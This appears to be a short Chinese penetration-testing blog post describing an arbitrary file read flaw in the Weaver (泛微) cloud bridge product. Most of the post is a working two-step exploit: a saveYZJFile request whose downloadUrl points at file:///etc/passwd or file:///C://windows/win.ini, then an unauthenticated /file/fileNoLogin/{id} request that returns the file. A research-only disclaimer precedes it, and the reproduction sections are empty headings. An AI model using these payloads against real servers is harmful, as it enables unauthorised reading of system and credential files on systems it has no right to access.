免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
聚合网络安全,存储安全技术文章,融合安全最新讯息
点击蓝字 · 关注我们
01
漏洞标题
泛微云桥任意文件读取
02
生成文件id
0x01 payload
Linux:
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
Windows:
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt
03
获取文件内容
Payload:/file/fileNoLogin/{id值}
04
Linux复现
05
Windows复现
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
评论